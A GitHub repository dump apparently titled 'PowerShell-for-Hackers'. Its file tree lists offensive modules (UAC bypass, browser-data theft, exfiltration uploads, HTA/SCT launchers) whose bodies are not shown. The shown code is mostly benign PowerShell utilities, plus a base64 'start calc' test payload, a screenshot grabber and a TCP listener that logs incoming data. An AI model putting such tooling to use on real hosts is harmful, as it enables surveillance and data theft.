├── Assets ├── placeholder ├── Scripts │ ├── v.txt │ ├── ov.txt │ ├── Powershell-2-Ducky │ │ ├── v.txt │ │ ├── placeholder │ │ └── ReadMe.md │ └── P-2-Ducky.ps1 ├── calc.txt ├── images │ ├── placeholder │ ├── dns-records.png │ ├── thumbnail.png │ └── hello.svg ├── b64.txt ├── calc.b64 ├── Ducky-Ex.jpg ├── JakobyDancing.gif ├── wtf.hta ├── c.hta ├── mshta.sct ├── wtf.sct ├── rev.xsl └── template.md ├── VideoNotes ├── assets │ ├── placeholder │ ├── diff.png │ └── thumbnail.png ├── getMotherboard.md ├── listIPV6.md ├── listModules.md ├── Test-SshConnection.ps1 ├── getInstalledSoftware.md ├── Ensure-ProfileExists.ps1 ├── listInstalledLanguages.md ├── findEmptyFiles ├── findHiddenFiles.md ├── findEncryptedFiles.md ├── findEmptyFolders.md ├── write-host.ps1 ├── shortestParameter.md ├── Write-Host2echo.md ├── FileHashInAds.md ├── OpenFormsOnSecondaryMonitors.ps1 ├── Invoke-ScriptBlockAtPosition.md ├── listPsProfiles.md ├── function Start-TcpListener.ps1 ├── takeScreenShot.md ├── Update-VariableValue.ps1 ├── htmlRenderer.ps1 ├── polyglot.md ├── Convert-Cmdlet.md ├── shortestAlias.md ├── passwordEncryption.md ├── compression.md ├── cGpt.txt ├── Convert-ImageToHtml.ps1 ├── PsChat.md ├── ImgDecon.md ├── CertManagmentGuide.md ├── Convert-ImageToAscii.ps1 ├── lsbSteggo.md ├── ChatGPT-Powershell.md ├── psChat.md ├── sendTCP.md └── Where-To-Start │ └── quiz.ps1 └── Functions ├── 123.ps1 ├── FunctionsThatShouldNotExist.md ├── honeypot.md ├── Def_Protocol_HNDLR.md ├── DefaultBrowser.md ├── Minimize-Apps.md ├── PlaySound.md ├── Speak.md ├── Clean-Exfil.md ├── Hide-Msg.md ├── PowerShell-2-Batch.md ├── Set-Volume.md ├── If-Admin.md ├── MsgBox.md ├── txt-img.md ├── Discord-Upload.md ├── Abuse-CapsLock.md ├── Url-2-Ascii.md ├── Get-GeoLocation.md ├── DropBox-Upload.md ├── Invoke-WebRequest.md ├── B64.md ├── B64-img.md ├── Get-BrowserData.md ├── Detect-Mouse-Movement.md ├── ns-lookup.md ├── Add-Network.md ├── Set-WallPaper.md ├── Wifi-Info.md └── UAC-Bypass.md /Assets/placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assets/Scripts/v.txt: -------------------------------------------------------------------------------- 1 | 1.0 2 | -------------------------------------------------------------------------------- /Assets/calc.txt: -------------------------------------------------------------------------------- 1 | calc 2 | -------------------------------------------------------------------------------- /Assets/Scripts/ov.txt: -------------------------------------------------------------------------------- 1 | 1.0 2 | -------------------------------------------------------------------------------- /Assets/images/placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /VideoNotes/assets/placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assets/Scripts/Powershell-2-Ducky/v.txt: -------------------------------------------------------------------------------- 1 | 1.0 2 | -------------------------------------------------------------------------------- /Assets/b64.txt: -------------------------------------------------------------------------------- 1 | cwB0AGEAcgB0ACAAYwBhAGwAYwA= 2 | -------------------------------------------------------------------------------- /Assets/calc.b64: -------------------------------------------------------------------------------- 1 | cwB0AGEAcgB0ACAAYwBhAGwAYwA= 2 | -------------------------------------------------------------------------------- /Assets/Scripts/Powershell-2-Ducky/placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assets/Ducky-Ex.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/Ducky-Ex.jpg -------------------------------------------------------------------------------- /Functions/123.ps1: -------------------------------------------------------------------------------- 1 | function cookie { 2 | write-host "Cooookies" -foregroundcolor 'green' 3 | calc 4 | } 5 | -------------------------------------------------------------------------------- /Assets/JakobyDancing.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/JakobyDancing.gif -------------------------------------------------------------------------------- /VideoNotes/assets/diff.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/VideoNotes/assets/diff.png -------------------------------------------------------------------------------- /Assets/images/dns-records.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/images/dns-records.png -------------------------------------------------------------------------------- /Assets/images/thumbnail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/images/thumbnail.png -------------------------------------------------------------------------------- /VideoNotes/assets/thumbnail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/VideoNotes/assets/thumbnail.png -------------------------------------------------------------------------------- /VideoNotes/getMotherboard.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | try { 6 | Get-WmiObject -Class Win32_BaseBoard 7 | } catch { 8 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 9 | } 10 | ``` 11 | -------------------------------------------------------------------------------- /VideoNotes/listIPV6.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | try { 6 | Get-NetAdapterBinding -name '*' -componentID 'ms_tcpip6' | Format-Table -autoSize -property Name,Enabled 7 | } catch { 8 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 9 | } 10 | ``` 11 | -------------------------------------------------------------------------------- /Assets/wtf.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Assets/c.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 10 | 11 | 12 | Nothing to see here.. 13 | 14 | 15 | -------------------------------------------------------------------------------- /VideoNotes/listModules.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | try { 6 | $modules = Get-Module -ListAvailable 7 | if ($modules) { 8 | $modules | Select-Object Name, Version, ModuleType, ExportedCommands | Format-Table -AutoSize 9 | } else { 10 | "No modules available." 11 | } 12 | } catch { 13 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 14 | } 15 | 16 | ``` 17 | -------------------------------------------------------------------------------- /Assets/mshta.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 16 | 17 | -------------------------------------------------------------------------------- /VideoNotes/Test-SshConnection.ps1: -------------------------------------------------------------------------------- 1 | function Test-SshConnection { 2 | param ( 3 | [string]$IpAddress, 4 | [int]$Port = 22 5 | ) 6 | 7 | $result = Test-NetConnection -ComputerName $IpAddress -Port $Port 8 | 9 | if ($result.TcpTestSucceeded) { 10 | Write-Host "SSH port on $IpAddress is open." 11 | return $true 12 | } else { 13 | Write-Host "SSH port on $IpAddress is closed or unreachable." 14 | return $false 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /VideoNotes/getInstalledSoftware.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | try { 5 | Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*, HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*, HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | select-object DisplayName,DisplayVersion,InstallDate | Format-Table -autoSize 6 | exit 0 # success 7 | } catch { 8 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 9 | exit 1 10 | } 11 | ``` 12 | -------------------------------------------------------------------------------- /Assets/wtf.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 13 | 14 | -------------------------------------------------------------------------------- /VideoNotes/Ensure-ProfileExists.ps1: -------------------------------------------------------------------------------- 1 | function Ensure-ProfileExists { 2 | # Check if the profile file exists 3 | if (-not (Test-Path -Path $PROFILE)) { 4 | # If the profile doesn't exist, create it along with the directory if necessary 5 | $profileDirectory = Split-Path -Path $PROFILE 6 | if (-not (Test-Path -Path $profileDirectory)) { 7 | New-Item -ItemType Directory -Path $profileDirectory -Force 8 | } 9 | New-Item -ItemType File -Path $PROFILE -Force 10 | Write-Host "Profile created at $PROFILE" 11 | } else { 12 | Write-Host "Profile already exists at $PROFILE" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /VideoNotes/listInstalledLanguages.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | function ListInstalledLanguages { 6 | $List = Get-WinUserLanguageList 7 | foreach ($Item in $List) { 8 | New-Object PSObject -property @{ 'Tag' = "$($Item.LanguageTag)"; 'Autonym' = "$($Item.Autonym)"; 'English' = "$($Item.EnglishName)"; 'Spellchecking' = "$($Item.Spellchecking)"; 'Handwriting' = "$($Item.Handwriting)" } 9 | } 10 | } 11 | 12 | try { 13 | ListInstalledLanguages | Format-Table -property Tag,Autonym,English,Spellchecking,Handwriting 14 | exit 0 # success 15 | } catch { 16 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 17 | exit 1 18 | } 19 | ``` 20 | -------------------------------------------------------------------------------- /VideoNotes/findEmptyFiles: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | param([string]$path = "$PWD") 5 | 6 | try { 7 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 8 | 9 | $path = Resolve-Path "$path" 10 | Write-Progress "Scanning $path for empty files..." 11 | [int]$count = 0 12 | Get-ChildItem $path -attributes !Directory -recurse | where {$_.Length -eq 0} | Foreach-Object { 13 | "📄$($_.FullName)" 14 | $count++ 15 | } 16 | Write-Progress -completed " " 17 | [int]$elapsed = $stopWatch.Elapsed.TotalSeconds 18 | "✔️ Found $count empty files within $path in $elapsed sec" 19 | } catch { 20 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 21 | } 22 | ``` 23 | -------------------------------------------------------------------------------- /VideoNotes/findHiddenFiles.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | param([string]$path = "$PWD") 5 | 6 | try { 7 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 8 | 9 | $path = Resolve-Path "$path" 10 | Write-Progress "Scanning $path for hidden files..." 11 | [int]$count = 0 12 | Get-ChildItem "$path" -attributes Hidden -recurse | Foreach-Object { 13 | "📄$($_.FullName)" 14 | $count++ 15 | } 16 | Write-Progress -completed " " 17 | [int]$elapsed = $stopWatch.Elapsed.TotalSeconds 18 | "✔️ Found $count hidden files within 📂$path in $elapsed sec" 19 | exit 0 # success 20 | } catch { 21 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 22 | exit 1 23 | } 24 | ``` 25 | -------------------------------------------------------------------------------- /VideoNotes/findEncryptedFiles.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | param([string]$path = "$PWD") 6 | 7 | try { 8 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 9 | 10 | $path = Resolve-Path "$path" 11 | Write-Progress "Scanning $path for encrypted files..." 12 | [int]$count = 0 13 | Get-ChildItem "$path" -attributes Encrypted -recurse | Foreach-Object { 14 | "📄$($_.FullName)" 15 | $count++ 16 | } 17 | Write-Progress -completed " " 18 | [int]$elapsed = $stopWatch.Elapsed.TotalSeconds 19 | "✔️ Found $count encrypted files within 📂$path in $elapsed sec" 20 | exit 0 # success 21 | } catch { 22 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 23 | exit 1 24 | } 25 | ``` 26 | -------------------------------------------------------------------------------- /VideoNotes/findEmptyFolders.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | param([string]$path = "$PWD") 5 | 6 | try { 7 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 8 | 9 | $path = Resolve-Path "$path" 10 | Write-Progress "Scanning $path for empty folders..." 11 | [int]$count = 0 12 | Get-ChildItem "$path" -attributes Directory -recurse -force | Where-Object { @(Get-ChildItem $_.FullName -force).Count -eq 0 } | ForEach-Object { 13 | "📂$($_.FullName)" 14 | $count++ 15 | } 16 | Write-Progress -completed " " 17 | [int]$Elapsed = $stopWatch.Elapsed.TotalSeconds 18 | "✔️ Found $count empty directories within 📂$path in $elapsed sec" 19 | exit 0 # success 20 | } catch { 21 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 22 | exit 1 23 | } 24 | ``` 25 | -------------------------------------------------------------------------------- /VideoNotes/write-host.ps1: -------------------------------------------------------------------------------- 1 | function Write-Host { 2 | [CmdletBinding()] 3 | param( 4 | [Parameter(Mandatory=$false, ValueFromRemainingArguments=$true)] 5 | [Object[]] 6 | $Object, 7 | 8 | [ConsoleColor] 9 | $ForegroundColor, 10 | 11 | [ConsoleColor] 12 | $BackgroundColor, 13 | 14 | [switch] 15 | $NoNewline, 16 | 17 | [string] 18 | $LogPath 19 | ) 20 | 21 | # Convert objects to a single string 22 | $output = $Object -join ' ' 23 | 24 | # Call the original Write-Host with the parameters 25 | Microsoft.PowerShell.Utility\Write-Host $output -ForegroundColor $ForegroundColor -BackgroundColor $BackgroundColor -NoNewline:$NoNewline 26 | 27 | # Custom logic for logging 28 | if ($LogPath) { 29 | Add-Content -Path $LogPath -Value $output 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /VideoNotes/shortestParameter.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | function Get-ShortestParameterAlias { 5 | param ( 6 | [Parameter(Mandatory)] 7 | [string]$CmdletName 8 | ) 9 | 10 | $cmdlet = Get-Command $CmdletName 11 | $parameters = $cmdlet.Parameters.Keys 12 | $shortestAliases = @{} 13 | 14 | foreach ($parameter in $parameters) { 15 | for ($i = 1; $i -le $parameter.Length; $i++) { 16 | $prefix = $parameter.Substring(0, $i) 17 | $matchingParams = $parameters | Where-Object { $_ -like "$prefix*" } 18 | 19 | if ($matchingParams.Count -eq 1) { 20 | $shortestAliases[$parameter] = "-$prefix" 21 | break 22 | } 23 | } 24 | } 25 | 26 | return $shortestAliases 27 | } 28 | 29 | # Example usage 30 | $shortestAliases = Get-ShortestParameterAlias -CmdletName "Get-ChildItem" 31 | $shortestAliases.GetEnumerator() | Format-Table -AutoSize 32 | 33 | ``` 34 | -------------------------------------------------------------------------------- /VideoNotes/Write-Host2echo.md: -------------------------------------------------------------------------------- 1 | $writeHostCommands = $ast.FindAll({ 2 | param($node) 3 | $node -is [System.Management.Automation.Language.CommandAst] -and 4 | $node.GetCommandName() -eq 'Write-Host' 5 | }, $true) 6 | 7 | # Replace each Write-Host with echo, keeping the first argument 8 | foreach ($command in $writeHostCommands) { 9 | $commandExtent = $command.Extent 10 | $commandText = $commandExtent.Text 11 | 12 | # Extract the first argument (if exists) 13 | $firstArgument = $command.CommandElements[1].Extent.Text -replace '^\s+', '' # Remove leading whitespace 14 | 15 | # Create the echo command with the first argument 16 | $echoCommand = "echo $firstArgument" 17 | 18 | # Replace the command text with 'echo' and first argument 19 | $scriptContent = $scriptContent.Replace($commandText, $echoCommand) 20 | } 21 | -------------------------------------------------------------------------------- /VideoNotes/FileHashInAds.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | function Set-FileHashInADS { 6 | param ( 7 | [Parameter(Mandatory=$true)] 8 | [string]$FilePath 9 | ) 10 | 11 | # Check if the file exists 12 | if (-not (Test-Path -Path $FilePath)) { 13 | Write-Error "File not found: $FilePath" 14 | return 15 | } 16 | 17 | # Calculate the hash of the file 18 | $fileHash = $null 19 | try { 20 | $fileHash = Get-FileHash -Path $FilePath -Algorithm SHA256 | Select-Object -ExpandProperty Hash 21 | } catch { 22 | Write-Error "Failed to calculate hash for file: $FilePath. Error: $_" 23 | return 24 | } 25 | 26 | # Create/overwrite the ADS named 'hash' with the file hash 27 | $hashStreamPath = "$FilePath"+":hash" 28 | try { 29 | Set-Content -Path $hashStreamPath -Value $fileHash 30 | Write-Host "Hash stored in alternate data stream 'hash' for file $FilePath" 31 | } catch { 32 | Write-Error "Failed to write hash to alternate data stream for file: $FilePath. Error: $_" 33 | } 34 | } 35 | ``` 36 | -------------------------------------------------------------------------------- /VideoNotes/OpenFormsOnSecondaryMonitors.ps1: -------------------------------------------------------------------------------- 1 | function OpenFormsOnSecondaryMonitors { 2 | [CmdletBinding()] 3 | param () 4 | 5 | process { 6 | # Load System.Windows.Forms assembly for accessing monitor details and form handling 7 | Add-Type -AssemblyName System.Windows.Forms 8 | 9 | # Retrieve all screens connected to the system 10 | $screens = [System.Windows.Forms.Screen]::AllScreens 11 | 12 | # Iterate through each screen and open a form if it's not the primary monitor 13 | foreach ($screen in $screens) { 14 | if (-not $screen.Primary) { 15 | # Create a new form 16 | $form = New-Object System.Windows.Forms.Form 17 | $form.Text = "Secondary Monitor Form - $($screen.DeviceName)" 18 | $form.WindowState = 'Maximized' 19 | $form.FormBorderStyle = 'None' 20 | $form.StartPosition = 'Manual' 21 | $form.Bounds = $screen.Bounds 22 | 23 | # Show the form 24 | $form.Show() 25 | } 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /VideoNotes/Invoke-ScriptBlockAtPosition.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | function Invoke-ScriptBlockAtPosition { 3 | param ( 4 | [Parameter(Mandatory)] 5 | [scriptblock]$ScriptBlock, 6 | 7 | [int]$X = 0, 8 | [int]$Y = 0 9 | ) 10 | 11 | # Save current cursor position to restore later 12 | $originalPosition = $Host.UI.RawUI.CursorPosition 13 | 14 | try { 15 | # Set cursor position 16 | $newPosition = New-Object System.Management.Automation.Host.Coordinates $X, $Y 17 | $Host.UI.RawUI.CursorPosition = $newPosition 18 | 19 | # Invoke the script block 20 | & $ScriptBlock 21 | } 22 | finally { 23 | # Restore original cursor position 24 | $Host.UI.RawUI.CursorPosition = $originalPosition 25 | } 26 | } 27 | 28 | ``` 29 | 30 | 31 | ```powershell 32 | # Example script block 33 | $scriptBlock = { 34 | Write-Host "This is a test output." 35 | # Additional commands can be added here 36 | } 37 | 38 | # Invoke the script block at position (X: 10, Y: 5) 39 | Invoke-ScriptBlockAtPosition -ScriptBlock $scriptBlock -X 10 -Y 5 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /Functions/FunctionsThatShouldNotExist.md: -------------------------------------------------------------------------------- 1 | # Functions That Should Not Exist 2 | 3 | ## Replacing ( - and _ ) in Variable Names with Spaces 4 | 5 | ```powershell 6 | function Replace-DashesAndUnderscores { 7 | param ( 8 | [string]$InputString 9 | ) 10 | 11 | # Parse the input string into an AST 12 | $ast = [System.Management.Automation.Language.Parser]::ParseInput($InputString, [ref]$null, [ref]$null) 13 | 14 | # Find all function names in the AST 15 | $functionNames = $ast.FindAll({ 16 | $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] 17 | }, $true) 18 | 19 | # Replace '-' and '_' in function names with ' ' 20 | foreach ($function in $functionNames) { 21 | $functionName = $function.Name 22 | $newFunctionName = $functionName -replace '[-_]', ' ' 23 | $InputString = $InputString -replace [regex]::Escape($functionName), $newFunctionName 24 | } 25 | 26 | return $InputString 27 | } 28 | ``` 29 | 30 | ## Convert Switch Statement into Multiple If Statements 31 | 32 | ```powershell 33 | ** Code here 34 | ``` 35 | 36 | ## Camel Case the Whole Script 37 | 38 | ```powershell 39 | ** Code here 40 | ``` 41 | -------------------------------------------------------------------------------- /VideoNotes/listPsProfiles.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | function Get-PowerShellProfileDetails { 5 | try { 6 | $profilePaths = @{ 7 | AllUsersAllHosts = $PROFILE.AllUsersAllHosts 8 | AllUsersCurrentHost = $PROFILE.AllUsersCurrentHost 9 | CurrentUserAllHosts = $PROFILE.CurrentUserAllHosts 10 | CurrentUserCurrentHost = $PROFILE.CurrentUserCurrentHost 11 | } 12 | 13 | $level = 1 14 | $profiles = foreach ($key in $profilePaths.Keys) { 15 | $location = $profilePaths[$key] 16 | $existent = if (Test-Path $location) { "True" } else { "False" } 17 | New-Object PSObject -Property @{ 18 | Level = $level 19 | Profile = $key 20 | Location = $location 21 | Existent = $existent 22 | ParentFolder = Split-Path $location -Parent 23 | } 24 | $level++ 25 | } 26 | 27 | $profiles | Select-Object Profile, Level, Location, Existent, ParentFolder 28 | } catch { 29 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 30 | } 31 | } 32 | 33 | ``` 34 | 35 | -------------------------------------------------------------------------------- /VideoNotes/function Start-TcpListener.ps1: -------------------------------------------------------------------------------- 1 | function Start-TcpListener { 2 | param( 3 | [int]$Port = 80, 4 | [string]$LogFile = "root\logs\log.txt" 5 | ) 6 | 7 | # Ensure the logs directory exists 8 | $logDir = Split-Path -Path $LogFile -Parent 9 | if (-not (Test-Path -Path $logDir)) { 10 | New-Item -ItemType Directory -Path $logDir 11 | } 12 | 13 | # Loop to keep the listener running 14 | while ($true) { 15 | # Create a TCP Listener 16 | $listener = New-Object System.Net.Sockets.TcpListener '0.0.0.0', $Port 17 | $listener.Start() 18 | 19 | try { 20 | # Wait for a client connection 21 | $client = $listener.AcceptTcpClient() 22 | 23 | # Get the network stream 24 | $stream = $client.GetStream() 25 | $reader = New-Object System.IO.StreamReader($stream) 26 | 27 | # Read data from the client 28 | $data = $reader.ReadToEnd() 29 | 30 | # Append data to the log file 31 | Add-Content -Path $LogFile -Value $data 32 | 33 | # Clean up 34 | $reader.Close() 35 | $client.Close() 36 | } 37 | finally { 38 | $listener.Stop() 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /Functions/honeypot.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | function Set-HoneyPot { 5 | 6 | Param( 7 | [Parameter(Mandatory=$false)] 8 | [ValidateSet('Created', 'Changed', 'Deleted', 'Renamed', 'Error')] 9 | [string]$event 10 | ) 11 | 12 | # Define the path to the file you want to monitor 13 | $file = "C:\temp\file.txt" 14 | # Define the action that should be taken when the file changes 15 | 16 | 17 | $action = { 18 | write-host "deleted" 19 | <# 20 | switch ($event) { 21 | "Created" { Write-Host "Created" } 22 | "Changed" { Write-Host "Changed" } 23 | "Deleted" { Write-Host "Deleted" } 24 | "Renamed" { Write-Host "Renamed" } 25 | "Error" { Write-Host "Error" } 26 | default { Write-Host "This is not a recognized fruit." } 27 | } #> 28 | } 29 | 30 | 31 | # Create a new FileSystemWatcher object 32 | $watcher = New-Object System.IO.FileSystemWatcher 33 | $watcher.Path = Split-Path -Path $file -Parent 34 | $watcher.Filter = Split-Path -Path $file -Leaf 35 | $watcher.IncludeSubdirectories = $false 36 | $watcher.NotifyFilter = [System.IO.NotifyFilters]::LastWrite -bor [System.IO.NotifyFilters]::FileName 37 | 38 | 39 | # Register the event watcher 40 | $watcher.EnableRaisingEvents = $true 41 | Register-ObjectEvent -InputObject $watcher -EventName $event -Action $action -SourceIdentifier FileChangedEvent 42 | 43 | 44 | # Keep the script running until the user stops it manually 45 | while ($true) { 46 | Start-Sleep -Seconds 1 47 | } 48 | # Unregister the event watcher 49 | Unregister-Event -SourceIdentifier FileChangedEvent 50 | } 51 | ``` 52 | -------------------------------------------------------------------------------- /VideoNotes/takeScreenShot.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | function Take-Screenshot { 6 | param( 7 | [string]$FilePath = "" 8 | ) 9 | 10 | # Determine the default file path if not provided 11 | if ($FilePath -eq "") { 12 | $PicturesPath = [Environment]::GetFolderPath('MyPictures') 13 | $ScreenshotsPath = Join-Path $PicturesPath "Screenshots" 14 | 15 | # Create Screenshots folder if it doesn't exist 16 | if (-not (Test-Path $ScreenshotsPath -PathType Container)) { 17 | New-Item -Path $ScreenshotsPath -ItemType Directory | Out-Null 18 | } 19 | 20 | $Time = Get-Date 21 | $Filename = "$($Time.Year)-$($Time.Month)-$($Time.Day)T$($Time.Hour)-$($Time.Minute)-$($Time.Second).png" 22 | $FilePath = Join-Path $ScreenshotsPath $Filename 23 | } 24 | 25 | try { 26 | Add-Type -Assembly System.Windows.Forms 27 | $ScreenBounds = [System.Windows.Forms.SystemInformation]::VirtualScreen 28 | $ScreenshotObject = New-Object System.Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height 29 | $DrawingGraphics = [System.Drawing.Graphics]::FromImage($ScreenshotObject) 30 | $DrawingGraphics.CopyFromScreen($ScreenBounds.Location, [System.Drawing.Point]::Empty, $ScreenBounds.Size) 31 | $ScreenshotObject.Save($FilePath) 32 | $ScreenshotObject.Dispose() 33 | $DrawingGraphics.Dispose() 34 | 35 | Write-Output "✔️ Screenshot saved to $FilePath" 36 | } catch { 37 | Write-Error "⚠️ Error in taking screenshot: $($_.Exception.Message)" 38 | } 39 | } 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /VideoNotes/Update-VariableValue.ps1: -------------------------------------------------------------------------------- 1 | function Update-VariableValue { 2 | param ( 3 | [string]$FilePath = "/root/.config/powershell/Microsoft.PowerShell_profile.ps1", 4 | [string]$VariableName = "lastUpdate", 5 | [string]$NewValue = "your_new_value_here" 6 | ) 7 | 8 | # Read the script from the file 9 | $script = [System.IO.File]::ReadAllText($FilePath) 10 | 11 | # Parse the script into an AST 12 | $ast = [System.Management.Automation.Language.Parser]::ParseInput($script, [ref]$null, [ref]$null) 13 | 14 | # Find all Assignment Statements 15 | $assignments = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.AssignmentStatementAst] }, $true) 16 | 17 | # Filter for the specific variable 18 | $targetAssignment = $assignments | Where-Object { $_.Left.VariablePath.UserPath -eq $VariableName } 19 | 20 | if ($targetAssignment) { 21 | # Extract the full extent of the assignment statement 22 | $extent = $targetAssignment.Extent 23 | 24 | # Replace the value of the variable 25 | $script = $script.Remove($extent.StartOffset, $extent.Text.Length) 26 | $script = $script.Insert($extent.StartOffset, "`$$VariableName = '$NewValue'") 27 | 28 | # Write the updated script back to the file 29 | [System.IO.File]::WriteAllText($FilePath, $script) 30 | Write-Output "Updated `$VariableName variable in $FilePath" 31 | } else { 32 | Write-Output "`$$VariableName variable not found in $FilePath" 33 | } 34 | } 35 | 36 | # Usage example 37 | Update-VariableValue -VariableName "lastUpdate" -NewValue "cookies" 38 | -------------------------------------------------------------------------------- /VideoNotes/htmlRenderer.ps1: -------------------------------------------------------------------------------- 1 | # Load required assemblies 2 | Add-Type -AssemblyName System.Windows.Forms 3 | Add-Type -AssemblyName System.Drawing 4 | 5 | # Create the form 6 | $form = New-Object System.Windows.Forms.Form 7 | $form.Size = New-Object System.Drawing.Size(800,600) 8 | $form.Text = "Live HTML Renderer" 9 | $form.MinimumSize = New-Object System.Drawing.Size(800,600) 10 | 11 | # Create a menu with a full-screen option 12 | $menu = New-Object System.Windows.Forms.MainMenu 13 | $menuItem = $menu.MenuItems.Add("View") 14 | $menuItemFullScreen = $menuItem.MenuItems.Add("Toggle Full-Screen") 15 | $menuItemFullScreen.add_Click({ 16 | $form.WindowState = if ($form.WindowState -eq 'Normal') { 'Maximized' } else { 'Normal' } 17 | }) 18 | 19 | $form.Menu = $menu 20 | 21 | # Create the text area 22 | $textArea = New-Object System.Windows.Forms.RichTextBox 23 | $textArea.Location = New-Object System.Drawing.Point(10,10) 24 | $textArea.Size = New-Object System.Drawing.Size(380,580) 25 | $textArea.Anchor = 'Top,Left,Bottom' 26 | $textArea.Multiline = $true 27 | $textArea.ScrollBars = 'Vertical' 28 | $form.Controls.Add($textArea) 29 | 30 | # Create the WebBrowser control 31 | $webBrowser = New-Object System.Windows.Forms.WebBrowser 32 | $webBrowser.Location = New-Object System.Drawing.Point(400,10) 33 | $webBrowser.Size = New-Object System.Drawing.Size(380,580) 34 | $webBrowser.Anchor = 'Top,Right,Bottom' 35 | $form.Controls.Add($webBrowser) 36 | 37 | # Function to render HTML 38 | $renderHtml = { 39 | $webBrowser.DocumentText = $textArea.Text 40 | } 41 | 42 | # Set event handler for text change 43 | $textArea.add_TextChanged($renderHtml) 44 | 45 | # Show the form 46 | $form.ShowDialog() 47 | -------------------------------------------------------------------------------- /VideoNotes/polyglot.md: -------------------------------------------------------------------------------- 1 | | File Type | Beginning Signature (Hex) | Ending Signature (Hex) | 2 | |-----------------|------------------------------------------|-------------------------------| 3 | | JPEG | `FF D8` | `FF D9` | 4 | | PNG | `89 50 4E 47 0D 0A 1A 0A` | *No specific ending* | 5 | | GIF | `47 49 46 38 39 61` or `47 49 46 38 37 61` | *No specific ending* | 6 | | TIFF (little endian) | `49 49 2A 00` | *Varies* | 7 | | TIFF (big endian) | `4D 4D 00 2A` | *Varies* | 8 | | BMP | `42 4D` | *No specific ending* | 9 | | PDF | `25 50 44 46` | `%%EOF` (in ASCII) | 10 | | ZIP | `50 4B 03 04` or `50 4B 05 06` (empty archive) or `50 4B 07 08` (spanned archive) | *No specific ending* | 11 | | RAR | `52 61 72 21 1A 07 00` | *No specific ending* | 12 | | 7z | `37 7A BC AF 27 1C` | *No specific ending* | 13 | | MP3 (with ID3 tag) | `49 44 33` | *No specific ending* | 14 | | WAV | `52 49 46 46` followed by file size and `57 41 56 45` | *No specific ending* | 15 | | AVI | `52 49 46 46` followed by file size and `41 56 49 20` | *No specific ending* | 16 | | MP4 | `00 00 00 18 66 74 79 70` (varies) | *No specific ending* | 17 | | MKV | `1A 45 DF A3` | *No specific ending* | 18 | | FLV | `46 4C 56 01` | *No specific ending* | 19 | -------------------------------------------------------------------------------- 